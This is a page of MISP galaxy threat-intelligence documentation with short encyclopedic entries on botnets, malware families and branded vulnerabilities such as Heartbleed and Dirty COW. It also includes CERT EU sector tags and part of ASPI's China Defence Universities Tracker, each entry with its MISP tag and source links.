https://en.wikipedia.org/wiki/Remaiten

Retadup

Retadup is a worm affecting Windows machines primarily throughout Latin America. Its objective is to achieve persistence on its victims’ computers, to spread itself far and wide and to install additional malware payloads on infected machines. In the vast majority of cases, the installed payload is a piece of malware mining cryptocurrency on the malware authors’ behalf. The French law enforcement agency, National Gendarmerie, in 2019 announced the successful takedown of one of the largest wide-spread RETADUP botnet malware and how it remotely disinfected more than 850,000 computers worldwide with the help of researchers.

The tag is: misp-galaxy:botnet="Retadup"

Table 812. Table References

Links

https://decoded.avast.io/janvojtesek/putting-an-end-to-retadup-a-malicious-worm-that-infected-hundreds-of-thousands/

https://thehackernews.com/2019/08/retadup-botnet-malware.html

RootSTV

RootSTV is a trojan and downloader for Android devices, mainly SmartTVs. RootSTV downloads additional malicious programs from a server and executes them without the user’s consent.

The tag is: misp-galaxy:botnet="RootSTV"

Table 813. Table References

Links

https://www.bsi.bund.de/EN/Themen/Verbraucherinnen-und-Verbraucher/Cyber-Sicherheitslage/Methoden-der-Cyber-Kriminalitaet/Botnetze/Steckbriefe-aktueller-Botnetze/steckbriefe-aktueller-botnetze_node.html

Rovnix

Rovnix is a data-stealing trojan that spreads by email and infects Windows PCs. Initial versions of the malware featured the extraction of data from compromised machines using unencrypted comms but more recently this has evolved to feature encryption during broadcast. The malware spread via e-mails infected with the Andromeda downloader. The infected attachment gets executed by an unwary user and this in turn downloads and runs Rovnix. The whole attack is designed to steal financial information, mainly credit card numbers. A new cluster of infections by the Rovnix Trojan has infected more than 130,000 Windows computers in the UK alone.

The tag is: misp-galaxy:botnet="Rovnix"

Table 814. Table References

Links

https://www.theregister.com/2014/11/06/rovnix_trojan_outbreak/

Slenfbot

Slenfbot was first discovered in 2007 and, since then, numerous variants have followed; each with slightly different characteristics and new additions to the worm’s payload, such as the ability to provide the attacker with unauthorized access to the compromised host. Slenfbot primarily spreads by luring users to follow links to websites, which contain a malicious payload. Slenfbot propagates via instant messaging applications, removable drives and/or the local network via network shares. The code for Slenfbot appears to be closely managed, which may provide attribution to a single group and/or indicate that a large portion of the code is shared amongst multiple groups. The inclusion of other malware families and variants as well as its own continuous evolution, makes Slenfbot a highly effective downloader with a propensity to cause even more damage to compromised systems.

The tag is: misp-galaxy:botnet="Slenfbot"

Table 815. Table References

Links

https://en.wikipedia.org/wiki/Slenfbot

Stacheldraht

Stacheldraht is malware which performs a distributed denial-of-service (DDoS) attack. Stacheldraht uses a number of different denial-of-service (DoS) attack methods, including Ping flood, UDP flood, TCP SYN flood, and Smurf attack. Further, it can detect and automatically enable source address forgery. Adding encryption, it combines features of Trinoo and of Tribe Flood Network. The software runs on both Linux and Solaris.

The tag is: misp-galaxy:botnet="Stacheldraht"

Table 816. Table References

Links

https://en.wikipedia.org/wiki/Stacheldraht

Suppobox

Suppobox is a trojan that intercepts any network traffic connected with a monetary transaction when users buy or sell products online. The malware focuses on auction websites.

The tag is: misp-galaxy:botnet="Suppobox"

Suppobox is also known as:

  • Bayrob

  • Nivdort

Table 817. Table References

Links

https://www.bsi.bund.de/EN/Themen/Verbraucherinnen-und-Verbraucher/Cyber-Sicherheitslage/Methoden-der-Cyber-Kriminalitaet/Botnetze/Steckbriefe-aktueller-Botnetze/steckbriefe-aktueller-botnetze.html

Triada

Triada is a trojan for Android devices. Triada’s primary function is to record text messages. For example, it intercepts in-app purchases via text message and redirects payments made. Triada downloads other malware from a server and runs these programs.

The tag is: misp-galaxy:botnet="Triada"

Triada is also known as:

  • APK. Triada

Table 818. Table References

Links

https://www.bsi.bund.de/EN/Themen/Verbraucherinnen-und-Verbraucher/Cyber-Sicherheitslage/Methoden-der-Cyber-Kriminalitaet/Botnetze/Steckbriefe-aktueller-Botnetze/steckbriefe-aktueller-botnetze.html

Trinoo

Trinoo is a set of computer programs to conduct a DDoS attack. It is believed that trinoo networks have been set up on thousands of systems on the Internet that have been compromised by remote buffer overrun exploits.

The tag is: misp-galaxy:botnet="Trinoo"

Trinoo is also known as:

  • trin00

Table 819. Table References

Links

https://en.wikipedia.org/wiki/Trinoo

Zemra

Zemra is a DDoS Bot which was first discovered in underground forums in May 2012. Zemra is capable of HTTP and SYN Flood flooding and also has a simple Command & Control panel that is protected with 256-bit DES encryption for communicating with its command and control (C&C) server. Zemra also sends information such as Computer name, Language settings, and Windows version. It will send this data to a remote location on a specific date and time. It also opens a backdoor on TCP port 7710 to receive commands from a remote command-and-control server, and it is able to monitor devices, collect system information, execute files, and even update or uninstall itself if necessary.

The tag is: misp-galaxy:botnet="Zemra"

Table 820. Table References

Links

https://en.wikipedia.org/wiki/Zemra

Ztorg

Ztorg is a trojan for Android devices. Its functions include unauthorised user tracking, stealing passwords, the silent installation of additional applications without the user’s permission, and the collection of data on the mobile phone, such as its location and contacts. Ztorg is a piece of malware that opens a backdoor to an infected device. Through this backdoor, the attacker can gain access to the system and perform other actions. The malware is capable of a wide range of attack types, from information theft to downloading other malware.

The tag is: misp-galaxy:botnet="Ztorg"

Table 821. Table References

Links

https://www.bsi.bund.de/EN/Themen/Verbraucherinnen-und-Verbraucher/Cyber-Sicherheitslage/Methoden-der-Cyber-Kriminalitaet/Botnetze/Steckbriefe-aktueller-Botnetze/steckbriefe-aktueller-botnetze_node.html

Branded Vulnerability

List of known vulnerabilities and attacks with a branding.

Branded Vulnerability is a cluster galaxy available in JSON format at this location The JSON format can be freely reused in your application or automatically enabled in MISP.
authors

Unknown

Meltdown

Meltdown exploits the out-of-order execution feature of modern processors, allowing user-level programs to access kernel memory using processor caches as covert side channels. This is specific to the way out-of-order execution is implemented in the processors. This vulnerability has been assigned CVE-2017-5754.

The tag is: misp-galaxy:branded-vulnerability="Meltdown"

Spectre

Spectre exploits the speculative execution feature that is present in almost all processors in existence today. Two variants of Spectre are known and seem to depend on what is used to influence erroneous speculative execution. The first variant triggers speculative execution by performing a bounds check bypass and has been assigned CVE-2017-5753. The second variant uses branch target injection for the same effect and has been assigned CVE-2017-5715.

The tag is: misp-galaxy:branded-vulnerability="Spectre"

Heartbleed

Heartbleed is a security bug in the OpenSSL cryptography library, which is a widely used implementation of the Transport Layer Security (TLS) protocol. It was introduced into the software in 2012 and publicly disclosed in April 2014. Heartbleed may be exploited regardless of whether the vulnerable OpenSSL instance is running as a TLS server or client. It results from improper input validation (due to a missing bounds check) in the implementation of the TLS heartbeat extension, thus the bug’s name derives from heartbeat. The vulnerability is classified as a buffer over-read,[5] a situation where more data can be read than should be allowed.

The tag is: misp-galaxy:branded-vulnerability="Heartbleed"

Shellshock

Shellshock, also known as Bashdoor, is a family of security bugs in the widely used Unix Bash shell, the first of which was disclosed on 24 September 2014. Many Internet-facing services, such as some web server deployments, use Bash to process certain requests, allowing an attacker to cause vulnerable versions of Bash to execute arbitrary commands. This can allow an attacker to gain unauthorized access to a computer system.

The tag is: misp-galaxy:branded-vulnerability="Shellshock"

Ghost

The GHOST vulnerability is a serious weakness in the Linux glibc library. It allows attackers to remotely take complete control of the victim system without having any prior knowledge of system credentials. CVE-2015-0235 has been assigned to this issue. During a code audit Qualys researchers discovered a buffer overflow in the __nss_hostname_digits_dots() function of glibc. This bug can be triggered both locally and remotely via all the gethostbyname*() functions. Applications have access to the DNS resolver primarily through the gethostbyname*() set of functions. These functions convert a hostname into an IP address.

The tag is: misp-galaxy:branded-vulnerability="Ghost"

Stagefright

Stagefright is the name given to a group of software bugs that affect versions 2.2 ("Froyo") and newer of the Android operating system. The name is taken from the affected library, which among other things, is used to unpack MMS messages. Exploitation of the bug allows an attacker to perform arbitrary operations on the victim’s device through remote code execution and privilege escalation. Security researchers demonstrate the bugs with a proof of concept that sends specially crafted MMS messages to the victim device and in most cases requires no end-user actions upon message reception to succeed—the user doesn’t have to do anything to ‘accept’ the bug, it happens in the background. The phone number is the only target information.

The tag is: misp-galaxy:branded-vulnerability="Stagefright"

Badlock

Badlock is a security bug disclosed on April 12, 2016 affecting the Security Account Manager (SAM) and Local Security Authority (Domain Policy) (LSAD) remote protocols[1] supported by Windows and Samba servers.

The tag is: misp-galaxy:branded-vulnerability="Badlock"

Dirty COW

Dirty COW (Dirty copy-on-write) is a computer security vulnerability for the Linux kernel that affects all Linux-based operating systems including Android. It is a local privilege escalation bug that exploits a race condition in the implementation of the copy-on-write mechanism in the kernel’s memory-management subsystem. The vulnerability was discovered by Phil Oester. Because of the race condition, with the right timing, a local attacker can exploit the copy-on-write mechanism to turn a read-only mapping of a file into a writable mapping. Although it is a local privilege escalation, remote attackers can use it in conjunction with other exploits that allow remote execution of non-privileged code to achieve remote root access on a computer. The attack itself does not leave traces in the system log.

The tag is: misp-galaxy:branded-vulnerability="Dirty COW"

POODLE

The POODLE attack (which stands for "Padding Oracle On Downgraded Legacy Encryptio") is a man-in-the-middle exploit which takes advantage of Internet and security software clients' fallback to SSL 3.0. If attackers successfully exploit this vulnerability, on average, they only need to make 256 SSL 3.0 requests to reveal one byte of encrypted messages. Bodo Möller, Thai Duong and Krzysztof Kotowicz from the Google Security Team discovered this vulnerability; they disclosed the vulnerability publicly on October 14, 2014 (despite the paper being dated "September 2014" ). Ivan Ristic does not consider the POODLE attack as serious as the Heartbleed and Shellshock attacks. On December 8, 2014 a variation of the POODLE vulnerability that affected TLS was announced.

The tag is: misp-galaxy:branded-vulnerability="POODLE"

BadUSB

The ‘BadUSB’ vulnerability exploits unprotected firmware in order to deliver malicious code to computers and networks. This is achieved by reverse-engineering the device and reprogramming it. As the reprogrammed firmware is not monitored or assessed by modern security software, this attack method is extremely difficult for antivirus/security software to detect and prevent.

The tag is: misp-galaxy:branded-vulnerability="BadUSB"

ImageTragick

The tag is: misp-galaxy:branded-vulnerability="ImageTragick"

Blacknurse

Blacknurse is a low bandwidth DDoS attack involving ICMP Type 3 Code 3 packets causing high CPU loads first discovered in November 2016. The earliest samples we have seen supporting this DDoS method are from September 2017.

The tag is: misp-galaxy:branded-vulnerability="Blacknurse"

SPOILER

SPOILER is a security vulnerability on modern computer central processing units that uses speculative execution to improve the efficiency of Rowhammer and other related memory and cache attacks. According to reports, all modern Intel CPUs are vulnerable to the attack. AMD has stated that its processors are not vulnerable.

The tag is: misp-galaxy:branded-vulnerability="SPOILER"

Table 822. Table References

Links

https://arxiv.org/pdf/1903.00446v1.pdf

https://appleinsider.com/articles/19/03/05/new-spoiler-vulnerability-in-all-intel-core-processors-exposed-by-researchers

https://www.overclock3d.net/news/cpu_mainboard/spoiler_alert-_intel_cpus_impacted_by_new_vulnerability/1

https://www.1e.com/news-insights/blogs/the-spoiler-vulnerability/

https://www.bleepingcomputer.com/news/security/amd-believes-spoiler-vulnerability-does-not-impact-its-processors/

BlueKeep

A ‘wormable’ critical Remote Code Execution (RCE) vulnerability in Remote Desktop Services that could soon become the new go-to vector for spreading malware

The tag is: misp-galaxy:branded-vulnerability="BlueKeep"

Table 823. Table References

Links

https://www.welivesecurity.com/2019/05/22/patch-now-bluekeep-vulnerability/

Cert EU GovSector

Cert EU GovSector.

Cert EU GovSector is a cluster galaxy available in JSON format at this location The JSON format can be freely reused in your application or automatically enabled in MISP.
authors

Various

Constituency

The tag is: misp-galaxy:cert-eu-govsector="Constituency"

EU-Centric

The tag is: misp-galaxy:cert-eu-govsector="EU-Centric"

EU-nearby

The tag is: misp-galaxy:cert-eu-govsector="EU-nearby"

World-class

The tag is: misp-galaxy:cert-eu-govsector="World-class"

Unknown

The tag is: misp-galaxy:cert-eu-govsector="Unknown"

Outside World

The tag is: misp-galaxy:cert-eu-govsector="Outside World"

China Defence Universities Tracker

The China Defence Universities Tracker is a database of Chinese institutions engaged in military or security-related science and technology research. It was created by ASPI’s International Cyber Policy Centre..

China Defence Universities Tracker is a cluster galaxy available in JSON format at this location The JSON format can be freely reused in your application or automatically enabled in MISP.
authors

Australian Strategic Policy Institute

Academy of Military Science (中国人民解放军军事科学院)

AMS is responsible for leading and coordinating military science for the whole military. AMS is involved in not only the development of theory, strategy, and doctrine but also advancing national defense innovation. Pursuant to the PLA reforms, AMS has undergone dramatic changes starting in June 2017. At a July 2017 ceremony marking the AMS’s reorganisation, Xi urged the AMS to construct a ‘world-class military scientific research institution.’ Through the National Defence Science and Technology Innovation Institute, the AMS is pursuing research in cutting-edge technologies including unmanned systems, artificial intelligence, biotechnology and quantum technology.

The tag is: misp-galaxy:china-defence-universities="Academy of Military Science (中国人民解放军军事科学院)"

Table 824. Table References

Links

https://unitracker.aspi.org.au/universities/academy-of-military-science

Aero Engine Corporation of China (中国航空发动机集团有限公司)

AECC is a leading producer of aircraft parts for the People’s Liberation Army (PLA), having separated from its parent company the Aviation Industry Corporation of China (AVIC) in 2016. The company reports having 27 affiliated or subordinate companies, three major listed companies, and 84,000 staff. AVIC and the Commercial Aircraft Corporation of China (also known as COMAC) are major shareholders in AECC.AECC’s main products include aircraft engines, combustion gas turbines, and transmission systems. AECC also develops aircraft power units, helicopter drive systems, monocrystalline blades, turbine disks, and graphene.AECC was established in order to improve China’s capability in developing domestically built aircraft engines as part of the ‘Made in China 2025’ program. A priority is strengthening its supply chains within China. Though indigenously developed engines have proven challenging for AECC, the company had purported success in providing thrust vector control technology for the J-10B fighter jet.

The tag is: misp-galaxy:china-defence-universities="Aero Engine Corporation of China (中国航空发动机集团有限公司)"

Table 825. Table References

Links

https://unitracker.aspi.org.au/universities/aero-engine-corporation-of-china

Air Force Command College (中国人民解放军空军指挥学院)

The PLA Air Force Command College in Beijing is considered the PLA Air Force’s ‘peak institution for educating mid-rank and senior officers’ for command posts across the service. The college has a long history and was initially established in Nanjing during the early years of the People’s Republic in 1958.The Air Force Command College offers a range of degree programmes, mainly at the postgraduate level, including training in military disciplines such as military history, strategy, and tactics. It has published research on control science and radar. The college’s other specialties include battlefield command, military operations as well as political–ideological education.

The tag is: misp-galaxy:china-defence-universities="Air Force Command College (中国人民解放军空军指挥学院)"

Table 826. Table References

Links

https://unitracker.aspi.org.au/universities/air-force-command-college

Air Force Communication NCO Academy (中国人民解放军空军通信士官学校)

The Air Force Communications Officers Academy is the PLA’s premier institution for the training of non-commissioned officers in communications systems and security. Established in 1986 as the Dalian Communications NCO College, the institution was renamed after Xi Jinping’s military reforms in 2017. The academy’s areas of research include command automation and satellite communications, along with wired and wireless communications.

The tag is: misp-galaxy:china-defence-universities="Air Force Communication NCO Academy (中国人民解放军空军通信士官学校)"

Table 827. Table References

Links

https://unitracker.aspi.org.au/universities/air-force-communications-officers-college

Air Force Early Warning Academy (中国人民解放军空军预警学院)

The Air Force Early Warning Academy is ‘an institution that trains military personnel from the PLA Air Force and Navy’s radar and electronic warfare units in command, engineering and technology’ that was established after the amalgamation of the Air Defence Academy and Radar College in 1958. As such, the Air Force Early Warning Academy focuses its research on radar engineering, information command systems engineering, networked command engineering, and early warning detection systems.

The tag is: misp-galaxy:china-defence-universities="Air Force Early Warning Academy (中国人民解放军空军预警学院)"

Table 828. Table References

Links

https://unitracker.aspi.org.au/universities/air-force-early-warning-academy

Air Force Engineering University (中国人民解放军空军工程大学)

The Air Force Engineering University (AFEU) is one of the PLA’s five comprehensive universities alongside NUDT, Naval Engineering University, PLA Information Engineering University and Army Engineering University. It trains students in a variety of engineering and military disciplines related to air combat.AFEU currently has around 8,000 students, including 1,600 postgraduate students. Its priority areas include technical studies in information and communication systems engineering as well as in social sciences such as in professional military training. Research into unmanned aerial vehicle technology is another important area of research at the university. In 2017, China’s Ministry of Education ranked AFEU equal fourth for armament science out of nine universities, only awarding it a B- grade for the discipline.Colleges under AFEU include:

The tag is: misp-galaxy:china-defence-universities="Air Force Engineering University (中国人民解放军空军工程大学)"

Table 829. Table References

Links

https://unitracker.aspi.org.au/universities/air-force-engineering-university

Air Force Flight Academy Shijiazhuang (空军石家庄飞行学院)

Air Force Flight Academy Shijiazhuang (空军石家庄飞行学院)

The tag is: misp-galaxy:china-defence-universities="Air Force Flight Academy Shijiazhuang (空军石家庄飞行学院)"

Table 830. Table References

Links

https://unitracker.aspi.org.au/universities/air-force-flight-academy-shijiazhuang

Air Force Harbin Flight Academy (空军哈尔滨飞行学院)

The Academy is home to the Air Force Harbin Flight Academy Simulation Training Center, 2,500m2 large-scale aircraft simulator where students can train in simulated transport and bomber aircraft. The Academy hopes to continue developing the Simulation Training Center into a ‘laboratory for air operations,’ including advanced trainings like simulated tactical confrontations.

The tag is: misp-galaxy:china-defence-universities="Air Force Harbin Flight Academy (空军哈尔滨飞行学院)"

Table 831. Table References

Links

https://unitracker.aspi.org.au/universities/air-force-harbin-flight-academy

Air Force Logistics University (中国人民解放军空军后勤学院)

The Air Force Logistics University is an institution devoted to the study of command, management and technology for the PLA, established in Shanxi by the Central Military Commission in 1954. The university focusses its research on ‘management engineering’ for military equipment such as weaponry and aircraft fuel and also maintains research programmes on air battle command and personnel management.

The tag is: misp-galaxy:china-defence-universities="Air Force Logistics University (中国人民解放军空军后勤学院)"

Table 832. Table References

Links

https://unitracker.aspi.org.au/universities/air-force-logistics-university

Air Force Medical University (中国人民解放军空军军医大学)

The Air Force Medical University, also known as the Fourth Military Medical University, is the PLA’s premier institution for research into medical and psychological sciences, having been placed under command of the Air Force after Xi Jinping’s military reforms in 2017. Its major areas of study are medical and psychological sciences tailored for personnel engaging in air and space operations, military preventative medicine and various other forms of clinical research.The Air Force Medical University conducts significant amounts of psychological research. Scientists from the Air Force Medical University have written studies on suicide, mental health across China, and mental health in military universities. The university’s scientists have also looked at the extent to which mindfulness training can reduce anxiety for undergraduates at military universities, and at how fear induced by virtual combat scenarios impacts decision-making. This indicates that the university is interested in issues of troop morale and decision-making in high-stress situations.

The tag is: misp-galaxy:china-defence-universities="Air Force Medical University (中国人民解放军空军军医大学)"

Table 833. Table References

Links

https://unitracker.aspi.org.au/universities/fourth-military-medical-university

Air Force Research Institute (中国人民解放军空军研究院)

The Air Force Research Institute is an air force scientific research institute, the successor to the Air Force Equipment Academy (空军装备研究院), that was established in 2017. The institute runs the Key Laboratory of Complex Aviation System Simulation (复杂航空系统仿真国防重点实验室) and carries out research on areas such as aircraft design, flight control, guidance and navigation, and electronic countermeasures.

The tag is: misp-galaxy:china-defence-universities="Air Force Research Institute (中国人民解放军空军研究院)"

Table 834. Table References

Links

https://unitracker.aspi.org.au/universities/air-force-research-institute

Air Force Xi’an Flight Academy (中国人民解放军空军西安飞行学院)

Created upon the merger of the PLA Air Force’s Second and Fifth Flight Academies in 2011, the Air Force Xi’an Flight Academy specialises in training airmen in aviation while passing on the PLA’s ‘revolutionary traditions’. It remains ‘one of the Air Force’s three advanced institutions in air combat, and is known to train the PLA Air Force’s JJ-7 fighter pilots. Given this focus on training, the institution engages in little scientific research.

The tag is: misp-galaxy:china-defence-universities="Air Force Xi’an Flight Academy (中国人民解放军空军西安飞行学院)"

Table 835. Table References

Links

https://unitracker.aspi.org.au/universities/air-force-xian-flight-academy

Anhui University (安徽大学)

Anhui University is overseen by the Anhui Provincial Government. In January 2019, defence industry agency SASTIND and the Anhui Provincial Government signed an agreement to jointly develop Anhui University. This agreement with SASTIND suggests that the university will increase its role in defense research in the future.

The tag is: misp-galaxy:china-defence-universities="Anhui University (安徽大学)"

Table 836. Table References

Links

https://unitracker.aspi.org.au/universities/anhui-university

Army Academy of Armored Forces (中国人民解放军陆军装甲兵学院)

The Army Academy of the Armored Forces is China’s lead institute responsible for training and research for armoured combat. This includes a focus on tank warfare, mechanised artillery and infantry operations. The academy offers training in ‘armored combat command, surveillance and intelligence, operational tactics’ as well as in engineering disciplines relevant to operations involving the PLA Ground Force’s armoured corps, such as materials science, mechanical engineering, electrical engineering and automation, communications engineering, weapons systems engineering and photoelectric information science.

The tag is: misp-galaxy:china-defence-universities="Army Academy of Armored Forces (中国人民解放军陆军装甲兵学院)"

Table 837. Table References

Links

https://unitracker.aspi.org.au/universities/army-academy-of-armored-forces

Army Academy of Artillery and Air Defense (中国人民解放军陆军炮兵防空兵学院)

The Army Academy of Artillery and Air Defense is an institution devoted to training artillery and air defence officers in the PLA Ground Force. Its areas of focus include electrical engineering and automation, munitions engineering and explosives technology, radar engineering, and missile engineering.

The tag is: misp-galaxy:china-defence-universities="Army Academy of Artillery and Air Defense (中国人民解放军陆军炮兵防空兵学院)"

Table 838. Table References

Links

https://unitracker.aspi.org.au/universities/army-academy-of-artillery-and-air-defense

Army Academy of Border and Coastal Defense (中国人民解放军陆军边海学院)

With a history dating back to 1941, the Army Academy of Border and Coastal Defense is the only institution of higher education devoted to training PLA Ground Force personnel in border and coastal defence operations. Its subjects of focus include firepower command and control engineering, and command information systems engineering.

The tag is: misp-galaxy:china-defence-universities="Army Academy of Border and Coastal Defense (中国人民解放军陆军边海学院)"

Table 839. Table References

Links

https://unitracker.aspi.org.au/universities/army-academy-of-border-and-coastal-defense

Army Aviation College (中国人民解放军陆军航空兵学院)

The Army Aviation College is the PLA’s institution responsible for training mid-career helicopter pilots from the PLA Air Force and aviation officers from the PLA Ground Force. The college’s subject areas include aircraft and engine design, aviation communications and air defence systems, flight radar maintenance engineering, and combat aircraft maintenance engineering.

The tag is: misp-galaxy:china-defence-universities="Army Aviation College (中国人民解放军陆军航空兵学院)"

Table 840. Table References

Links

https://unitracker.aspi.org.au/universities/army-aviation-college

Army Engineering University (中国人民解放军陆军工程大学)

The Army Engineering University was established in 2017 following the abolition of the PLA University of Science and Technology. The university is devoted to research on ‘engineering, technology and combat command systems’ for the PLA Land Force.The university’s areas of research include:

The tag is: misp-galaxy:china-defence-universities="Army Engineering University (中国人民解放军陆军工程大学)"

Table 841. Table References

Links

https://unitracker.aspi.org.au/universities/army-engineering-university

Army Infantry Academy (中国人民解放军陆军步兵学院)

The Army Infantry Academy is a higher education institution in China devoted to providing elementary training in command for infantry soldiers in the PLA Ground Force. The academy teaches courses in operational disciplines such as command information systems engineering, armored vehicles engineering and weapons systems engineering. As well as providing formal teaching, the Army Infantry Academy also provides oversight for training exercises and electronic warfare simulations.

The tag is: misp-galaxy:china-defence-universities="Army Infantry Academy (中国人民解放军陆军步兵学院)"

Table 842. Table References

Links

https://unitracker.aspi.org.au/universities/army-infantry-academy

Army Medical University (中国人民解放军陆军军医大学)

The PLA Army Medical University, formerly known as the Third Military Medical University, is a medical education university affiliated with the PLA Ground Force. It was formed in 2017 through a merger with the PLA Western Theater Command Urumqi Comprehensive Training Base’s Military Medical Training Brigade and the Tibet Military Region’s Eighth Hospital. The Army Medical University includes six national key laboratories and 32 Ministry of Education or military key laboratories. It has won military awards for science and technology progress and seven national science and technology prizes.

The tag is: misp-galaxy:china-defence-universities="Army Medical University (中国人民解放军陆军军医大学)"

Table 843. Table References

Links

https://unitracker.aspi.org.au/universities/army-medical-university

Army Military Transportation Academy (中国人民解放军陆军军事交通学院)

The Army Military Transport Academy is a higher education institution devoted to training PLA Ground Force personnel in military transport and logistics. The academy focusses on military transport command engineering, command and automation engineering, ordnance engineering, and armament sustainment command.

The tag is: misp-galaxy:china-defence-universities="Army Military Transportation Academy (中国人民解放军陆军军事交通学院)"

Table 844. Table References

Links

https://unitracker.aspi.org.au/universities/army-military-transportation-academy-2

Army Research Institute (中国人民解放军陆军研究院)

The Army Research Institute is an institution devoted to advanced defence research with applications to land warfare. The institute engages in a variety of defence research including radar technology, lasers, and hybrid electric vehicles. Researchers from the institute are known to have collaborated with partners from China’s civilian universities in areas such as advanced manufacturing and automatic control, and laser technology.The Army Research Institute collaborates with civilian companies as part of China’s military-civil fusion program. For example, General Guo Guangsheng from the Army Research Institute made a visit to Hong Run Precision Instruments Co. Ltd. (虹润精密仪器有限公司) on 24 August 2019 to assess how the company was performing in its military-civil fusion activities. Researchers from the Army Research Institute have also been involved in the product design and development of dual-use automobiles as part of a military-civil fusion project called ‘Research, Development and Commerialisation of Advanced Off-road Passenger Vehicles’ (新一代军民通用高端越野乘用汽车研发及产业化). The project included research into vehicles such as the BJ80 military and civilian off-road passenger vehicles as well as the BJ40L off-road vehicle.

The tag is: misp-galaxy:china-defence-universities="Army Research Institute (中国人民解放军陆军研究院)"

Table 845. Table References

Links

https://unitracker.aspi.org.au/universities/army-research-institute

Army Service Academy (中国人民解放军陆军勤务学院)

The Army Service Academy is an institution of higher education in the PLA devoted to training personnel in a variety of logistics disciplines. The logistics disciplines taught at the academy include: fuel logistics, military facility management, military procurement management, and integrated logistics management. Its areas of focus for defence research include military energy engineering, defence engineering, and management science and engineering.

The tag is: misp-galaxy:china-defence-universities="Army Service Academy (中国人民解放军陆军勤务学院)"

Table 846. Table References

Links

https://unitracker.aspi.org.au/universities/army-service-academy

Army Special Operations Academy (中国人民解放军陆军特种作战学院)

The academy’s key subjects include special operations command, surveillance and intelligence, and command information systems engineering.

The tag is: misp-galaxy:china-defence-universities="Army Special Operations Academy (中国人民解放军陆军特种作战学院)"

Table 847. Table References

Links

https://unitracker.aspi.org.au/universities/army-special-operations-academy

Aviation Industry Corporation of China (中国航空工业集团有限公司)

AVIC is a state-owned defence conglomerate established in 2008 that focuses on providing aerospace products for military and civilian customers. AVIC’s main product lines include a variety of aircraft for freight, commercial and military aviation along with other more specialised products such as printed circuit boards, liquid crystal displays and automotive parts, according to Bloomberg. AVIC also provides services to the aviation sector through flight testing, engineering, logistics and asset management.The conglomerate has over 400,000 employees and has a controlling share in around 200 companies. AVIC has over 25 subsidiaries listed on its website.AVIC is the PLA Air Force’s largest supplier of military aircraft, producing fighter jets, strike aircraft, unmanned aerial vehicles and surveillance aircraft. Along with its core work on military aircraft, AVIC also produces surface-to-air, air-to-surface and air-to-air missiles. Its headline projects include the J-10 and the J-11 fighter aircraft. AVIC’s subsidiary, the Shenyang Aircraft Corporation, was responsible for delivery of the J-15 fighter. Another subsidiary of AVIC, the Chengdu Aerospace Corporation, developed the PLA-AF’s J-20 stealth fighter jet.

The tag is: misp-galaxy:china-defence-universities="Aviation Industry Corporation of China (中国航空工业集团有限公司)"

Table 848. Table References

Links

https://unitracker.aspi.org.au/universities/aviation-industry-corporation-of-china

Aviation University of Air Force (中国人民解放军空军航空大学)

AUAF is one of China’s main institutions devoted to the training of air force pilots. Its areas of focus are training in flight command and research into aeronautical engineering. Disciplines taught at AUAF include command science and engineering, aerospace science and technology as well as political work and military command.AUAF scientists publish and attend conferences on radar technology and electronic countermeasures. For example, scientists from AUAF’s Information Countermeasures Division co-authored a publication on radar target recognition with a researcher from the PLA’s Unit 94936 – an aviation unit stationed in Hangzhou. AUAF scientists have also done notable work on complex systems radar and signal pre-sorting.

The tag is: misp-galaxy:china-defence-universities="Aviation University of Air Force (中国人民解放军空军航空大学)"

Table 849. Table References

Links

https://unitracker.aspi.org.au/universities/aviation-university-of-air-force

Beihang University (北京航空航天大学)

Beihang University engages in very high levels of defence research as one of the ‘Seven Sons of National Defence’ subordinate to the Ministry of Industry and Information Technology. The university specialises in aviation and spaceflight research. The top four employers of Beihang graduates in 2018 were all state-owned missile or defence aviation companies. In total, 29% of 2018 Beihang graduates who found employment were working in the defence sector.Beihang scientists are involved in the development of Chinese military aircraft and missiles. In 2018, the university signed a comprehensive strategic cooperation agreement with China Aerospace Science and Technology Corporation, a state-owned conglomerate that produces ballistic missiles and satellites. The university is also noteworthy for its leading research on stealth technology.Beihang hosts at least eight major defence laboratories working on fields such as aircraft engines, inertial navigation and fluid dynamics.

The tag is: misp-galaxy:china-defence-universities="Beihang University (北京航空航天大学)"

Table 850. Table References

Links

https://unitracker.aspi.org.au/universities/beihang-university

Beijing Electronic Science and Technology Institute (北京电子科技学院)

BESTI is a secretive university that trains information security experts for the bureaucracy. The institute is the only university run by the CCP General Office, which manages administrative matters for the Central Committee. The General Office is usually run by one of the general secretary’s most trusted aides. It oversees China’s cryptographic and state secrets agency as well as security for the party’s leadership.BESTI has a student population of around 2,000 and has strict admission requirements. Students at the university are scrutinized for their political beliefs, and are typically CCP or Communist Youth League members. The activities of their relatives are screened for political issues. Having no parents or siblings who worked abroad or were involved in ‘illegal organisations’ is a condition of enrolment. The institute claims to count 50 ministerial-level party officials among its 12,000 graduates.BESTI has a close relationship with Xidian University and Beijing University of Posts and Telecommunications. The two universities are its primary collaborators on scientific papers. BESTI runs joint master’s programs with Xidian University in cryptography, information and communication engineering, and computer applications technology. It also has joint doctoral programs with the University of Science and Technology of China and Beijing University of Posts and Telecommunications in cybersecurity.The university runs the Key Laboratory of Information Security (信息安全重点实验室/信息安全与保密重点实验室). Several websites claim that it runs a joint laboratory with the Chinese Academy of Sciences Institute of High Energy Physics, but this could not be confirmed.

The tag is: misp-galaxy:china-defence-universities="Beijing Electronic Science and Technology Institute (北京电子科技学院)"

Table 851. Table References

Links

https://unitracker.aspi.org.au/universities/beijing-electronic-science-and-technology-institute

Beijing Institute of Technology (北京理工大学)

BIT is one of the ‘Seven Sons of National Defence’ supervised by MIIT. It is a leading centre of military research and one of only fourteen institutions accredited to award doctorates in weapons science. In 2017, China’s Ministry of Education ranked BIT and Nanjing University of Science and Technology as the country’s top institutions for weapons science. It has received the most defence research prizes and defence patents out of all China’s universities. 31.80% of BIT graduates in 2018 who found employment were working in the defence sector.BIT’s claimed achievements include producing the PRC’s first light tank, first two-stage solid sounding rocket and first low-altitude altimetry radar. The university also states that it carries out world-class research on several areas of missile technology including “precision strikes, high damage efficiency, maneuver penetration, long-range suppression, and military communications systems and counter-measures”. In 2018, BIT announced that it was running a four-year experimental program training some of China’s top high school students in intelligent weapons systems.BIT is the chair of the B8 Cooperation Innovation Alliance (B8协同创新联盟 or 中国兵器协同创新联盟), a group of eight Chinese research institutions that specialize in weapons science—the ‘B’ in ‘B8’ stands for Chinese work for armaments, bingqi (兵器).BIT’s central role in advancing PLA warfighting capability is demonstrated by the fact that it participated in the development of equipment used by 22 of the 30 squads in the 2009 military parade for the 60th anniversary of the founding of the PRC.

The tag is: misp-galaxy:china-defence-universities="Beijing Institute of Technology (北京理工大学)"

